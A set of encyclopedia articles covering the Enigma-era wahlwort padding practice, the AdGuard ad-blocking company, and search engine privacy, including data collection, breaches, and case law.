Wahlwort (nonsense word or filler) is a cryptographic term used particularly in connection with the Wehrmacht, which used wahlworts with its Enigma rotor machines when encrypting its communications in World War II. The term describes a randomly selected word which was inserted at the beginning or end of the radiogram plaintext. The wahlwort was intended to hinder the enemy's cryptanalysis and prevent the decryption of the ciphertext. Application According to the secret regulations in force at that time, outlined in Der Schlüssel M - Verfahren M Allgemein (The Cipher M − M General Procedure), this procedure was used primarily to give radio messages different lengths ("Cipher M" refers to the Enigma M4, the naval variant of the series of Enigma machines). Indeed, plaintexts with the same content often had to be transmitted to different receiving operators in their encrypted form. To do so they were encrypted with different keys corresponding to the different encryption networks. This resulted in ciphertexts that were different, yet had the same length. If the enemy noticed different ciphertexts of similar length at approximately the same time, possibly from the same transmitting operator, they could suspect that the ciphertexts concealed the same plaintext. The British codebreakers at Bletchley Park (B.P.) were familiar with such cases and glad to receive them, calling such a pair a "kiss". Such a kiss was considered an ideal opportunity to decipher radio messages, even better than a "crib", a presumed section of plaintext. By introducing wahlworts of different lengths at the beginning or end of the message, sometimes at both, the lengths of the messages differed, which prevented, or at least hindered, such attacks. The length of a wahlwort was usually between four and fourteen letters.
The German code book gave as examples: "Wassereimer (bucket), Fernsprecher (telephone), Eichbaum (oak tree), Dachfirst (roof ridge), Kleiderschrank (wardrobe)." Wahlworts with only three letters occasionally appeared, such as ABC or XXX, but also very long compounds, such as Donaudampfschiffahrtsgesellschaftskapitän (Danube steamboating association captain) or Hottentottenpotentatentantenattentäter (Hottentot potentate aunt assassin). The rationale for choosing more or less meaningful German words (specifically compound nouns) as wahlworts, as opposed to random text such as CIHJT UUHML, was that the authorized recipient could verify that their deciphering of the radio message was error-free. However, according to regulations, wahlworts were required to be entirely unrelated to the content of the actual radio message, and to not "infringe on discipline and order." Wahlworts were also used in conjunction with other ciphering machines such as the Geheimschreiber (secret teleprinter) Siemens & Halske T52. "Introduced in 1940 on a wholesale scale, wahlworts might have knocked out the infant Crib Room before it had got properly on its feet." Results The introduction of wahlworts, which was first observed by the British in 1942 in North Africa, impeded the codebreakers' work. However, at that time the British were so well acquainted with the German methods that there was no stopping their continued success in code-breaking, despite the wahlworts. It was a nuisance for them to have to try out the various possibilities pertaining to the word order of the text when they did not know the length of the wahlworts, but this could not stop them from deciphering the text. Post-war British review of the German wahlwort method revealed the practice to be "too little and too late".
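The length-masking procedure described above can be sketched in a few lines of Python. The word list echoes the code book's examples, but the message, the seeds, and the choice to pad both ends are illustrative assumptions; the Enigma encipherment step itself is omitted:

```python
import random

# Illustrative filler words; the historical code book gave examples such
# as "Wassereimer" and "Fernsprecher". This is a sketch of the idea, not
# the actual Wehrmacht procedure.
WAHLWORTS = ["WASSEREIMER", "FERNSPRECHER", "EICHBAUM", "DACHFIRST", "KLEIDERSCHRANK"]

def pad_with_wahlwort(plaintext, rng):
    """Attach randomly chosen filler words at the beginning and end so
    that repeated transmissions of the same order differ in length."""
    return f"{rng.choice(WAHLWORTS)} {plaintext} {rng.choice(WAHLWORTS)}"

# The same (invented) sighting report, prepared for two different key
# networks, is now enciphered from padded texts of (usually) different
# lengths, denying codebreakers a same-length "kiss".
order = "KONVOI GESICHTET PLANQUADRAT AJ"
for_net_a = pad_with_wahlwort(order, random.Random(1))
for_net_b = pad_with_wahlwort(order, random.Random(2))
```

Since each padded text would then be enciphered under its own network key, an eavesdropper comparing the two ciphertexts could no longer match them up by length alone.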
As with other German measures attempting to strengthen the cryptographic security of Enigma, for example the introduction of the cryptographically strong methods of the Enigma Uhr (clock) or the pluggable UKW D (nicknamed Uncle Dick by the British), wahlworts failed because they were not introduced comprehensively and were adopted too late in the war. Literature John Jackson: Solving Enigma's Secrets – The Official History of Bletchley Park's Hut 6. BookTower Publishing, 2014, pp. 211–216. Tony Sale: The Bletchley Park 1944 Cryptographic Dictionary. Bletchley Park, 2001, p. 93 (PDF; 0.4 MB), retrieved 24 August 2018. External links Der Schlüssel M (German) / The Cipher M (PDF; 3.3 MB), scan of the German original regulations from 1940, accessed 23 August 2018. The 1944 Bletchley Park Cryptographic Dictionary, "Wahlwort" in a B.P. cryptographic dictionary, accessed 23 August 2018. References Enigma machine Classical ciphers
58934925
https://en.wikipedia.org/wiki/AdGuard
AdGuard
AdGuard Software Limited develops ad blocking and privacy protection software. Some of AdGuard's products are open-source, some are free, and some are shareware. AdGuard's DNS app supports Microsoft Windows, Linux, macOS, Android and iOS. AdGuard is also available as a browser extension. AdGuard Software Limited was founded in 2009 in Moscow. In 2014 the company was incorporated in Cyprus and subsequently moved its headquarters there. Products AdGuard products include: AdGuard Home AdGuard Home acts as a recursive DNS resolver, which responds with an invalid address for domains that appear in its filter lists. It is similar to Pi-hole. AdGuard Browser extensions The browser extension blocks video ads, interstitial ads, floating ads, pop-ups, banners, and text ads. It can also handle anti-adblock scripts. The product also blocks spyware and warns users of malicious websites. AdGuard Content Blocker is an additional browser extension for Yandex Browser and Samsung Internet, which uses the Content Blocker API. It downloads filter list updates and asks browsers to enforce them via the Content Blocker API. AdGuard applications AdGuard has Windows and Mac versions, as well as native mobile versions for Android and iOS. The application sets up a local VPN, which filters all traffic on the mobile device. AdGuard DNS AdGuard hosts free public DNS servers. Some of these servers provide DNS-level network filtering for blocking domains used for delivering advertisements, online tracking, and analytics. The product supports encryption technologies, including DNSCrypt, DNS over HTTPS, DNS over TLS and DNS-over-QUIC. AdGuard DNS also comes with an optional "Family Protection" mode for blocking access to websites with adult content as well as enforcing safe search in search engines. AdGuard began testing its DNS service in 2016, and officially launched it in 2018.
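The DNS-level filtering described above, answering queries for blocklisted domains with an unroutable address while passing everything else upstream, can be sketched as follows. The domains, the blocklist, and the sinkhole address are illustrative assumptions, not AdGuard's actual filter lists or implementation:

```python
# Sketch of DNS-level filtering in the style of AdGuard Home: answer
# queries for blocklisted domains with an unroutable "sinkhole" address
# and defer everything else to an upstream resolver. The domains and
# blocklist below are illustrative only.

BLOCKLIST = {"ads.example.com", "tracker.example.net"}
SINKHOLE_ADDR = "0.0.0.0"  # the "invalid address" returned for filtered names

def resolve(domain, upstream):
    """Return the sinkhole address for blocked domains; otherwise ask
    the upstream resolver (passed in as a callable)."""
    name = domain.lower().rstrip(".")  # normalize case and trailing dot
    if name in BLOCKLIST:
        return SINKHOLE_ADDR
    return upstream(name)

# Stand-in upstream resolver for demonstration purposes.
fake_upstream = {"example.org": "93.184.216.34"}.get
```

Because the blocked name resolves to an address no client can connect to, the ad or tracker request silently fails, which is the whole filtering effect at the DNS layer.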
Reception While the company's products have earned positive feedback in industry publications, a series of Google and Apple app store policy decisions between 2014 and 2018 impeded user access to AdGuard's mobile applications. Macworld mentioned AdGuard for iOS in a list of five "best adblockers for iOS". In April 2020, Android Central stated that AdGuard uses "a little more processing power to do its thing than uBlock Origin", but it is "the best all-in-one blocking tool for someone who doesn't want to use more than one extension" because it blocks cryptomining. However, Android Central recommended uBlock Origin with a dedicated cryptomining blocker over AdGuard. Research AdGuard developers have taken up research in order to inform wider audiences about user privacy, cybersecurity and data protection. The following issues are notable cases involving the developers: Top-ranked websites involved in cryptojacking Facebook Ad Network widespread distribution Fake adblockers Popular Android and iOS app privacy issues Incidents Distribution of AdGuard for Android was discontinued by Google Play at the end of 2014. It nevertheless is still being updated and has been made available for download from the developers' own website. AdGuard for iOS had not been updated since the summer of 2018 due to Apple policies against ad blocking, though it was still present in the Apple App Store. In summer 2019, access to the updates of AdGuard's earlier edition for iOS was restored. In September 2018, AdGuard was hit by a credential stuffing attack. AdGuard claims that their servers were not compromised and that attackers instead used credential pairs reused by victims on other sites and stolen from those sites. According to a company spokesperson, they "do not know what accounts exactly were accessed by the attackers", so the company reset passwords for all accounts "as a precautionary measure". Also, AdGuard pledged to use "Have I Been Pwned?"
API to check all new passwords for appearance in known public data leaks. Furthermore, they implemented stricter password security requirements. In November 2020, the Microsoft Edge add-on store was infiltrated with fraudulent add-ons resembling those for AdGuard VPN and a few security products. References Ad blocking software Android (operating system) software IOS software Privacy software 2009 software Free and open-source software Shareware
59012195
https://en.wikipedia.org/wiki/Search%20engine%20privacy
Search engine privacy
Search engine privacy is a subset of internet privacy that deals with user data being collected by search engines. Both types of privacy fall under the umbrella of information privacy. Privacy concerns regarding search engines can take many forms, such as the ability for search engines to log individual search queries, browsing history, IP addresses, and cookies of users, and to conduct user profiling in general. The collection of personally identifiable information (PII) of users by search engines is referred to as "tracking". This is controversial because search engines often claim to collect a user's data in order to better tailor results to that specific user and to provide the user with a better searching experience. However, search engines can also abuse and compromise their users' privacy by selling their data to advertisers for profit. In the absence of regulations, users must decide what is more important to their search engine experience: relevance and speed of results or their privacy, and choose a search engine accordingly. The legal framework for protecting user privacy is not very solid. The most popular search engines collect personal information, but other, privacy-focused search engines have cropped up recently. There have been several well-publicized breaches of search engine user privacy involving companies like AOL and Yahoo. For individuals interested in preserving their privacy, there are options available, such as using software like Tor, which anonymizes the user's location and personal information, or using a privacy-focused search engine. Privacy policies Search engines generally publish privacy policies to inform users about what data of theirs may be collected and what purposes it may be used for.
While these policies may be an attempt at transparency by search engines, many people never read them and are therefore unaware of how much of their private information, like passwords and saved files, is collected from cookies and may be logged and kept by the search engine. This ties in with the phenomenon of notice and consent, which is how many privacy policies are structured. Notice and consent policies essentially consist of a site showing the user a privacy policy and having them click to agree. This is intended to let the user freely decide whether or not to go ahead and use the website. This decision, however, may not actually be made so freely because the costs of opting out can be very high. Another big issue with putting the privacy policy in front of users and having them accept quickly is that the policies are often very hard to understand, even in the unlikely case that a user decides to read them. Privacy-minded search engines, such as DuckDuckGo, state in their privacy policies that they collect much less data than search engines such as Google or Yahoo, and may not collect any. As of 2008, search engines were not in the business of selling user data to third parties, though they do note in their privacy policies that they comply with government subpoenas. Google and Yahoo Google, founded in 1998, is the most widely used search engine, receiving billions of search queries every month. Google logs all search terms in a database along with the date and time of search, browser and operating system, IP address of user, the Google cookie, and the URL that shows the search engine and search query. The privacy policy of Google states that they pass user data on to various affiliates, subsidiaries, and "trusted" business partners. Yahoo, founded in 1995, also collects user data. It is a well-known fact that users do not read privacy policies, even for services that they use daily, such as Yahoo! Mail and Gmail.
This persistent failure of consumers to read privacy policies can be disadvantageous to them because, while they may not pick up on differences in the language of privacy policies, judges in court cases certainly do. This means that search engine and email companies like Google and Yahoo are technically able to keep up the practice of targeting advertisements based on email content, since they declare that they do so in their privacy policies. A study examining how much consumers cared about Google's privacy policies, specifically Gmail's, and their detail found that users often thought Google's practices were somewhat intrusive, but that users would rarely be willing to counteract this by paying a premium for their privacy.

DuckDuckGo

DuckDuckGo, founded in 2008, claims to be privacy-focused. DuckDuckGo does not collect or share any personal information of users, such as IP addresses or cookies, which other search engines usually do log and keep for some time. It also does not serve spam, and it protects user privacy further by anonymizing search queries from the website the user chooses and by using encryption. Similar privacy-oriented search engines include Startpage and Disconnect.

Types of data collected by search engines

Most search engines can, and do, collect personal information about their users according to their own privacy policies. This user data could be anything from location information to cookies, IP addresses, search query histories, click-through history, and online fingerprints. This data is often stored in large databases, and users may be assigned numbers in an attempt to provide them with anonymity. Data can be stored for an extended period of time. For example, the data collected by Google on its users is retained for up to 9 months, though some studies state that this number is actually 18 months.
This data is used for various reasons, such as optimizing and personalizing search results for users, targeting advertising, and trying to protect users from scams and phishing attacks. Such data can be collected even when a user is not logged in to their account or is using a different IP address, through the use of cookies.

Uses

User profiling and personalization

What search engines often do once they have collected information about a user's habits is create a profile of them, which helps the search engine decide which links to show for different search queries submitted by that user or which ads to target them with. A notable development in this field is the use of automated learning, also known as machine learning. Using this, search engines can refine their profiling models to more accurately predict what any given user may want to click on, by A/B testing results offered to users and measuring users' reactions. Companies like Google, Netflix, YouTube, and Amazon have all started personalizing results more and more. One notable example is how Google Scholar takes into account the publication history of a user in order to produce results it deems relevant. Personalization also occurs when Amazon recommends books or when IMDb suggests movies, by using previously collected information about a user to predict their tastes. For personalization to occur, a user need not even be logged into their account.

Targeted advertising

The internet advertising company DoubleClick, which helped advertisers target users for specific ads, was bought by Google in 2008 and remained a subsidiary until June 2018, when Google rebranded and merged DoubleClick into its Google Marketing Platform. DoubleClick worked by depositing cookies on users' computers that would track the sites they visited that carried DoubleClick ads.
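The cross-site cookie mechanism described above can be sketched as a toy model. Everything here is hypothetical (names, structure, and API are invented for illustration; this is not DoubleClick's actual implementation): a tracker embedded on many sites assigns each browser a single cookie ID and logs every visit, letting it assemble a cross-site browsing profile.

```python
# Toy model of third-party cookie tracking (hypothetical sketch).
import uuid
from collections import defaultdict

class Tracker:
    def __init__(self):
        # cookie_id -> list of sites visited while carrying that cookie
        self.visits = defaultdict(list)

    def on_page_load(self, browser_cookies, site):
        # Set the tracking cookie on first contact, then reuse it on
        # every later page load that embeds the tracker.
        cookie_id = browser_cookies.setdefault("tracker_id", str(uuid.uuid4()))
        self.visits[cookie_id].append(site)
        return cookie_id

tracker = Tracker()
browser = {}  # the browser's cookie jar for the tracker's domain

for site in ["news.example", "shop.example", "travel.example"]:
    tracker.on_page_load(browser, site)

# One cookie ID now links all three visits into a single profile.
profile = tracker.visits[browser["tracker_id"]]
print(profile)  # ['news.example', 'shop.example', 'travel.example']
```

Because the same cookie ID appears on every participating site, the tracker, not the individual sites, ends up holding the combined browsing history; this is the profile-building capability at issue in the acquisition debate below.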
There was a privacy concern when Google was in the process of acquiring DoubleClick that the acquisition would let Google create even more comprehensive profiles of its users, since it would be collecting data about search queries and additionally tracking websites visited. This could lead to users being shown ads that are increasingly effective through behavioral targeting. With more effective ads comes the possibility of more purchases from consumers that they may not have made otherwise. In 1994, a conflict between selling ads and the relevance of search results began. This was sparked by the development of the cost-per-click model, which challenged the established cost-per-mille model. The cost-per-click method was directly related to what users searched for, whereas the cost-per-mille method was directly influenced by how much a company could pay for an ad, no matter how many times people interacted with it.

Improving search quality

Besides ad targeting and personalization, Google also uses data collected on users to improve the quality of searches. Search result click histories and query logs are crucial in helping search engines optimize search results for individual users. Search logs also help search engines develop the algorithms they use to return results, such as Google's well-known PageRank. An example of this is how Google uses databases of information to refine Google Spell Checker.

Privacy organizations

Many believe that user profiling is a severe invasion of user privacy, and organizations such as the Electronic Privacy Information Center (EPIC) and Privacy International are focused on advocating for user privacy rights. In fact, EPIC filed a complaint with the Federal Trade Commission in 2007 claiming that Google should not be able to acquire DoubleClick on the grounds that it would compromise user privacy.
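The link-analysis ranking mentioned under "Improving search quality" above can be illustrated with a minimal PageRank power iteration over a hypothetical four-page link graph. This is a textbook sketch only, not Google's production algorithm, and the graph is invented for the example.

```python
# Minimal PageRank power iteration (illustrative sketch).
def pagerank(links, damping=0.85, iterations=50):
    pages = list(links)
    n = len(pages)
    rank = {p: 1.0 / n for p in pages}  # start with a uniform distribution
    for _ in range(iterations):
        new = {p: (1 - damping) / n for p in pages}
        for p, outs in links.items():
            share = rank[p] / len(outs) if outs else 0
            for q in outs:
                new[q] += damping * share
            if not outs:  # dangling page: spread its rank evenly
                for q in pages:
                    new[q] += damping * rank[p] / n
        rank = new
    return rank

# Hypothetical link graph: page -> pages it links to.
links = {"A": ["B", "C"], "B": ["C"], "C": ["A"], "D": ["C"]}
ranks = pagerank(links)
print(max(ranks, key=ranks.get))  # prints C, the most linked-to page
```

The iteration conserves total rank (the scores always sum to 1), and pages that attract links from already important pages rise to the top, which is the core idea behind ranking by link structure.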
Users' perception of privacy

Experiments have been done to examine consumer behavior when given information on the privacy of retailers by integrating privacy ratings with search engines. Researchers had the treatment group use a search engine called Privacy Finder, which scans websites and automatically generates an icon showing the level of privacy a site will give the consumer compared with the privacy preferences that consumer has specified. The result of the experiment was that subjects in the treatment group, those using a search engine that indicated the privacy levels of websites, purchased products from websites that gave them higher levels of privacy, whereas the participants in the control groups opted for the products that were simply the cheapest. The study participants were also given a financial incentive, because they would get to keep the leftover money from their purchases. This study suggests that, since participants had to use their own credit cards, they had a significant aversion to purchasing products from sites that did not offer the level of privacy they wanted, indicating that consumers place a monetary value on their privacy.

Ethical debates

Many individuals and scholars have recognized the ethical concerns regarding search engine privacy.

Pro data collection

The collection of user data by search engines can be viewed as a positive practice because it allows the search engine to personalize results. This implies that users would receive more relevant results and be shown more relevant advertisements when their data, such as past search queries, location information, and clicks, is used to create a profile for them. Also, search engines are generally free of charge for users and can remain afloat because one of their main sources of revenue is advertising, which can be more effective when targeted.
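The profile-based personalization described above can be sketched with a toy term-frequency profile built from a user's past queries. All data, names, and scoring here are hypothetical; real systems use far richer signals and models.

```python
# Toy interest profile from query history (illustrative sketch).
from collections import Counter

STOPWORDS = {"the", "a", "in", "for", "best", "how", "to"}

def build_profile(queries):
    """Count non-stopword terms across a user's past queries."""
    terms = Counter()
    for q in queries:
        terms.update(w for w in q.lower().split() if w not in STOPWORDS)
    return terms

def rerank(results, profile):
    """Boost results whose keywords overlap the user's profile."""
    def score(result):
        return sum(profile[w] for w in result["keywords"])
    return sorted(results, key=score, reverse=True)

history = ["best hiking boots", "hiking trails in oregon", "trail running shoes"]
profile = build_profile(history)

results = [
    {"url": "city-guide.example", "keywords": ["city", "guide"]},
    {"url": "trail-gear.example", "keywords": ["hiking", "trail", "gear"]},
]
print(rerank(results, profile)[0]["url"])  # trail-gear.example ranks first
```

Even this crude sketch shows the trade-off at the heart of the debate: the re-ranking only works because the engine has retained the user's query history.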
Anti-data collection

This collection of user data can also be seen as an overreach by private companies for their own financial gain, or as an intrusive surveillance tactic. Search engines can make money using targeted advertising because advertisers are willing to pay a premium to present their ads to the most receptive consumers. Also, when a search engine collects and catalogs large amounts of data about its users, there is the potential for it to be leaked accidentally or breached. The government can also subpoena user data from search engines that maintain databases of it. Search query database information may also be subpoenaed by private litigants for use in civil cases, such as divorces or employment disputes.

Data and privacy breaches

AOL search data leak

One major controversy regarding search engine privacy was the AOL search data leak of 2006. For academic and research purposes, AOL made public a list of about 20 million search queries made by about 650,000 unique users. Although AOL assigned unique identification numbers to the users instead of attaching names to each query, it was still possible to ascertain the true identities of many users simply by analyzing what they had searched, including locations near them and names of friends and family members. A notable example of this was how The New York Times identified Thelma Arnold through "reverse searching". Users also sometimes perform "ego searches", in which they search for themselves to see what information about them is on the internet, making it even easier to identify supposedly anonymous users. Many of the search queries released by AOL were incriminating or seemingly extremely private, such as "how to kill your wife" and "can you adopt after a suicide attempt". This data has since been used in several experiments that attempt to measure the effectiveness of user privacy solutions.

Google and Yahoo

Both Google and Yahoo were the subjects of a Chinese hack in 2010.
While Google responded to the situation seriously by hiring new cybersecurity engineers and investing heavily in securing user data, Yahoo took a much more lax approach. Google started paying hackers to find vulnerabilities in 2010, while it took Yahoo until 2013 to follow suit. Yahoo was also identified in the Snowden data leaks as a common hacking target for the spies of various nations, yet Yahoo still did not give its newly hired chief information security officer the resources to really effect change within the company. In 2012, Yahoo hired Marissa Mayer, previously a Google employee, as its new CEO, but she chose not to invest much in Yahoo's security infrastructure and went so far as to refuse to implement a basic, standard security measure: forcing the reset of all passwords after a breach. Yahoo is known for being the subject of multiple breaches and hacks that have compromised large amounts of user data. As of late 2016, Yahoo had announced that at least 1.5 billion user accounts had been breached during 2013 and 2014. The breach of 2013 compromised over a billion accounts, while the breach of 2014 involved about 500 million accounts. The data compromised in the breaches included personally identifiable information such as phone numbers, email addresses, and birth dates, as well as information like security questions (used to reset passwords) and encrypted passwords. Yahoo made a statement saying that its breaches were the result of state-sponsored actors, and in 2017, two Russian intelligence officers were indicted by the United States Department of Justice as part of a conspiracy to hack Yahoo and steal user data. As of 2016, the Yahoo breaches of 2013 and 2014 were the largest of all time. In October 2018, there was a Google+ data breach that potentially affected about 500,000 accounts, which led to the shutdown of the Google+ platform.
Government subpoenas of data

The government may want to subpoena user data from search engines for any number of reasons, which is why such data is a big threat to user privacy. In 2006, the government sought such data as part of its defense of the Child Online Protection Act (COPA), and only Google refused to comply. While protecting the online privacy of children may be an honorable goal, there are concerns about whether the government should have access to such personal data to achieve it. At other times, the government may want the data for national security purposes; access to big databases of search queries in order to prevent terrorist attacks is a common example. Whatever the reason, it is clear that the fact that search engines create and maintain these databases of user data is what makes it possible for the government to access them. Another concern regarding government access to search engine user data is "function creep", a term that here refers to how data originally collected by the government for national security purposes may eventually be used for other purposes, such as debt collection. This would indicate to many a government overreach. While protections for search engine user privacy have started developing recently, the government has increasingly been on the side that wants to ensure search engines retain data, making users less protected and their data more available for anyone to subpoena.

Methods for increasing privacy

Switching search engines

A different, although popular, route for a privacy-centered user to take is to simply start using a privacy-oriented search engine, such as DuckDuckGo. This search engine maintains the privacy of its users by not collecting data on or tracking its users. While this may sound simple, users must take into account the trade-off between privacy and relevant results when deciding to switch search engines. Results for search queries can be very different when the search engine has no search history to aid it in personalization.
Using privacy-oriented browsers

Mozilla is known for its belief in protecting user privacy in Firefox. Mozilla Firefox users can delete the tracking cookie that Google places on their computer, making it much harder for Google to group data. Firefox also has a button called "Clear Private Data", which allows users to have more control over their settings. Internet Explorer users have this option as well. When using a browser like Google Chrome or Safari, users also have the option to browse in "incognito" or "private browsing" mode, respectively. When in these modes, the user's browsing history and cookies are not collected.

Opting out

The Google, Yahoo!, AOL, and MSN search engines all allow users to opt out of the behavioral targeting they use. Users can also delete their search and browsing history at any time. The Ask.com search engine also has AskEraser, which, when used, purges user data from Ask's servers. Deleting a user's profile and history of data from search engine logs also helps protect user privacy in the event a government agency wants to subpoena it: if there are no records, there is nothing the government can access. It is important to note that simply deleting one's browsing history does not delete all the information the search engine holds; some companies do not delete the data associated with an account when the browsing history is cleared, and even companies that do delete user data usually do not delete all of it, keeping records of how the user used the search engine.

Social network solution

An innovative solution, proposed by researchers Viejo and Castellà-Roca, is a social network solution whereby user profiles are distorted. In their plan, each user would belong to a group, or network, of people who all use the search engine. Every time somebody wanted to submit a search query, it would be passed on to another member of the group to submit on their behalf until someone submitted it.
This would ideally lead to all search queries being divided equally among all members of the network. This way, the search engine cannot build a useful profile of any individual user in the group, since it has no way to discern which query actually belonged to which user.

Delisting and reordering

After the Google Spain v. AEPD case, it was established that people had the right to request that search engines delete personal information from their search results, in compliance with other European data protection regulations. This process of simply removing certain search results is called delisting. While effective in protecting the privacy of those who wish information about them not to be accessible through a search engine, it does not necessarily protect the contextual integrity of search results. For data that is not highly sensitive or compromising, reordering search results is another option, whereby people would be able to rank how relevant certain data is at any given point in time, which would then alter the results given when someone searched their name.

Anonymity networks

A do-it-yourself option for privacy-minded users is to use software like Tor, which is an anonymity network. Tor functions by encrypting user data and routing queries through thousands of relays. While this process is effective at masking IP addresses, it can slow the speed of results. Although Tor may work to mask IP addresses, studies have shown that a simulated attacker could still match search queries to users even when they were anonymized using Tor.

Unlinkability and indistinguishability

Unlinkability and indistinguishability are also well-known solutions to search engine privacy, although they have proven somewhat ineffective in actually providing users with anonymity for their search queries.
Both unlinkability and indistinguishability solutions try to anonymize search queries from the user who made them, making it impossible for the search engine to definitively link a specific query with a specific user and create a useful profile on them. This can be done in a couple of different ways.

Unlinkability

One way is for the user to hide information, such as their IP address, from the search engine; this is an unlinkability solution. It is perhaps the simpler and easier approach for the user, because any user can do this by using a VPN, although it still does not guarantee total privacy from the search engine.

Indistinguishability

Another way is for the user to use a plugin or software that generates multiple different search queries for every real search query the user makes. This is an indistinguishability solution, and it functions by obscuring the real searches a user makes so that a search engine cannot tell which queries are the software's and which are the user's. It is then more difficult for the search engine to use the data it collects on a user to do things like target ads.

Legal rights and court cases

Because the internet and search engines are relatively recent creations, no solid legal framework for privacy protections regarding search engines has been put in place. However, scholars do write about the implications of existing laws on privacy in general to inform what right to privacy search engine users have. As this is a developing field of law, there have been several lawsuits with respect to the privacy search engines are expected to afford their users.

United States

The Fourth Amendment

The Fourth Amendment is well known for the protections it offers citizens from unreasonable searches and seizures, but in Katz v. United States (1967), these protections were extended to cover intrusions on the privacy of individuals, in addition to intrusions on property and persons.
The privacy of individuals is a broad term, but it is not hard to imagine that it includes the online privacy of an individual.

The Sixth Amendment

The Confrontation Clause of the Sixth Amendment is applicable to the protection of big data from government surveillance. The Confrontation Clause essentially states that defendants in criminal cases have the right to confront witnesses who provide testimonial statements. If a search engine company like Google gives information to the government to prosecute a case, these witnesses are the Google employees involved in the process of selecting which data to hand over to the government. The specific employees who must be available to be confronted under the Confrontation Clause are the producer who decides what data is relevant and provides the government with what it asked for, the Google analyst who certifies the proper collection and transmission of data, and the custodian who keeps records. The data these employees of Google curate for trial use is then thought of as testimonial statements. The overall effect of the Confrontation Clause on search engine privacy is that it places a check on how the government can use big data and provides defendants with protection from human error.

Katz v. United States

This 1967 case is prominent because it established a new interpretation of privacy under the Fourth Amendment, specifically that people had a reasonable expectation of it. Katz v. United States concerned whether it was constitutional for the government to electronically listen to and record a conversation Katz had from a public phone booth. The court ruled that it did violate the Fourth Amendment, because the actions of the government were considered a "search" for which the government needed a warrant. When thinking about search engine data collected about users, the way telephone communications were classified under Katz v. United States could be a precedent for how such data should be handled. In Katz v. United States, public telephones were deemed to have a "vital role" in private communications. This case took place in 1967, but nowadays the internet and search engines surely have this vital role in private communications, and people's search queries and IP addresses can be thought of as analogous to the private phone calls placed from public booths.

United States v. Miller

This 1976 Supreme Court case is relevant to search engine privacy because the court ruled that when third parties gathered or had information given to them, the Fourth Amendment was not applicable. Jayni Foley argues that the ruling of United States v. Miller implies that people cannot have an expectation of privacy when they provide information to third parties. When thinking about search engine privacy, this is important because people willingly provide search engines with information in the form of their search queries and various other data points that they may not realize are being collected.

Smith v. Maryland

In the 1979 case Smith v. Maryland, the Supreme Court built on the precedent about assumption of risk set in the 1976 United States v. Miller case. The court ruled that the Fourth Amendment did not prevent the government from monitoring who dialed which phone numbers by using a pen register, because doing so did not qualify as a "search". Both the United States v. Miller and Smith v. Maryland cases have been used to deny users the Fourth Amendment privacy protections for the records that internet service providers (ISPs) keep. This is also articulated in the Sixth Circuit's Guest v. Leis case as well as the United States v. Kennedy case, where the courts ruled that Fourth Amendment protections did not apply to ISP customer data, since customers willingly provided ISPs with their information just by using the services of ISPs.
Similarly, the current legal structure regarding privacy and assumption of risk can be interpreted to mean that users of search engines cannot expect privacy with regard to the data they communicate by using search engines.

Electronic Communications Privacy Act

The Electronic Communications Privacy Act (ECPA) of 1986 was passed by Congress in an effort to start creating a legal structure for privacy protections in the face of new forms of technology, although it was by no means comprehensive, because there are considerations for current technologies that Congress never imagined in 1986 and could not have accounted for. The ECPA does little to regulate ISPs and mainly prevents government agencies from gathering information stored by ISPs without a warrant. What the ECPA does not do, unsurprisingly because it was enacted before internet usage became commonplace, is say anything about search engine privacy and the protections users are afforded in terms of their search queries.

Gonzales v. Google Inc.

The background of this 2006 case is that the government was trying to bolster its defense of the Child Online Protection Act (COPA). It was conducting a study of how effective filtering software was at blocking material harmful to children. To do this, the government subpoenaed search data from Google, AOL, Yahoo!, and Microsoft to use in its analysis and to show that people search for information that is potentially compromising to children. This search data that the government wanted included both the URLs that appeared to users and the actual search queries of users. Of the search engines the government subpoenaed to produce search queries and URLs, only Google refused to comply, even after the request was reduced in size. Google claimed that handing over these logs would mean handing over personally identifiable information and user identities.
The court ruled that Google had to hand over 50,000 randomly selected URLs to the government, but not search queries, because handing over queries could seed public distrust of the company and therefore compromise its business.

Law of Confidentiality

While not a strictly defined law enacted by Congress, the law of confidentiality is common law that protects information shared by a party who has trust in, and an expectation of privacy from, the party they share the information with. If the content of search queries, and the logs they are stored in, is thought of in the same manner as information shared with a physician, as it is similarly confidential, then it ought to be afforded the same privacy protections.

Europe

Google Spain v. AEPD

The European Court of Justice ruled in 2014, in the Google Spain SL v. Agencia Española de Protección de Datos case, that European citizens had the "right to be forgotten", meaning that they had the right to demand that search engines remove certain personal data about them from search results. While this single court decision did not directly establish the "right to be forgotten", the court interpreted existing law to mean that people had the right to request that some information about them be wiped from search results provided by search engine companies like Google. The background of this case is that a Spanish citizen, Mario Costeja González, set out to erase himself from Google's search results because they revealed potentially compromising information about his past debts. In ruling in favor of Mario Costeja González, the court noted that search engines can significantly impact the privacy rights of many people and that Google controlled the dissemination of personal data.
This court decision did not claim that all citizens should be able to request that information about them be completely wiped from Google at any time, but rather that there are specific types of information, particularly information obstructing one's right to be forgotten, that do not need to be so easily accessible on search engines.

General Data Protection Regulation (GDPR)

The GDPR is a European regulation that was put in place to protect the data and privacy of European citizens, regardless of whether they are physically in the European Union. This means that countries around the globe have had to comply with its rules so that any European citizen residing in them is afforded the proper protections. The regulation became enforceable in May 2018.